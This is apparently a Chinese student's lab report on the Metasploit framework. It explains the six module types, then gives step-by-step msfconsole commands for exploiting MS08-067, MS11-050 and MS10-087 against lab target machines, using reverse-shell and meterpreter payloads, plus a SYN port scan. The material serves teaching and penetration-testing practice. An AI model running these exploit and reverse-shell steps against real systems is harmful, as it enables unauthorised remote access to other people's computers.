概述
MSF的六种模块
- Exploit模块
- 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
- 形象点来说就是攻击模块
- Payload模块
- 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
- Encoder模块
- 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
- 不改变payload作用,但能对payload进行加工
- Aux模块
- 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
- 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
- Post模块
- 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
- 这里主要指的是攻击之后可能用到的模块
- Nops模块
- 是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90
- 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置
MS08-067漏洞攻击
- 启用msf终端:
msfconsole
- 可以通过:
search ms08_067
,查找相应的漏洞 - 找到后,会显示相应漏洞的模块,如下图所示
- 等待时间可能会比较长
- msfconsole有一个好处,就是每一步的操作都可以提示你后续的步骤,即便不知道指令也可以通过
help
来查找 - 根据上述漏洞的模块,我们可以选择相应的模块
use exploit/windows/smb/ms08_067_netapi
- 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
show payloads
- 因为我们想要获取靶机的shell,所以可以选择以上2种攻击载荷
- 如:
set payload generic/shell_reverse_tcp
- 如:
- 注意:此处的目的是获取shell,如果想用
meterpreter
,找到相应的payload并设置即可
- 查看配置渗透攻击所需的配置项
show options
通过上述操作,可以让我们知道有哪些参数需要进行配置
-
set LHOST 192.168.42.133 //设置攻击IP set RHOST 192.168.42.222 //设置靶机IP
- 接下来可以看看有哪些合适的靶机平台
show targets
- 设置相应平台的编号:
set target 0
- 此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台
- 发起渗透攻击
exploit
- 获取shell如下图所示
- 攻击失败
- 删除靶机的相应补丁
- 还是失败
问题思考
- 第一次失败原因:攻击时一直提示,会话不能建立,查询后发现靶机的漏洞已经被补了
- 第二次失败原因:这个就不清楚了,
MS11050浏览器漏洞攻击
- 终端中打开
msfconsole
,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用MS11050漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
、set LPORT 自定义端口号
和set URIPATH 自定义域名
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
- 在靶机上使用IE浏览器访问192.168.199.143:8080/hfhf
- 攻击成功
MS10-087漏洞攻击
- 选取module:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
- 设置合适的payload:
set payload windows/exec
- 注:此处是运行一个可执行文件
-
set FILENAME 20145234.rft //设置生成文件rtf set CMD notepad.exe //绑定记事本执行
- 发起渗透攻击
exploit
- 将生成的文件从
/root/.msf4/local/20145234.rft
拷贝到靶机上,并把格式修改为.doc
- 双击运行,结果被成功绑定到记事本程序
辅助模块
- 进入
msfconsle
后,通过下面相关指令查找辅助模块show auxiliary
-
ack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测; ftpbounce:通过FTP BOUNCE攻击的原理对TCP服务进行枚举 syn:使用发送TCP SYN标志的方式探测开放的端口 tcp:通过一次完整的TCP链接来判断端口是否开放 xmas:一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤
- 选取相应的moudle,在这里选择如下:
use auxiliary/scanner/portscan/syn
-
设置好相应参数,可以通过
show options
来查看set RHOSTS 192.168.42.222 //设置扫描目标IP地址 set THREADS 50 //设置线程数
- 启动:
run
,扫描结果如下: - 此时,我们也可以在
msf
下用nmap的相关指令,对目标主机进行扫描:- 通过观察不难发现,扫描速度更快,并且对每种端口的作用也有了个说明,能弄清楚每个端口是干嘛的
- aux模块虽然不像exploit那样直接对靶机进行攻击,但它是排头兵,是对成功实现攻击的很好保障,比如在CTF竞赛中,我们为了查看靶机的web服务,首先就要对开放端口进行扫描,确认哪个端口是挂了web的,然后才有后面的后台扫描、拖库、旁注、提权等操作
- 所以辅助模块在整个六大模块中的地位也是举足轻重的
总结
- kali上的metasploit渗透测试工具,是一个功能强大内容丰富的工具集,可以针对系统漏洞、软件漏洞、服务漏洞进行攻击,对于每一种攻击,又有多种攻击载荷可供使用,对于每种攻击载荷又可以使用编码器模块进行加工,所以六大模块相辅相成,构成了渗透的完美系统
- 就这次实践本身来看,许多攻击还是有一定成功率的,但部分漏洞比较挑剔,只有在特定的系统环境、特定的触发条件,才会被渗透,所以有时为了验证某漏洞的存在,还要专门配一个可以被攻击的靶机;或者,为了攻击成功,不停地寻找更合适的漏洞,这也是本次实践所花的时间成本所在。
时间: 2024-10-09 22:26:10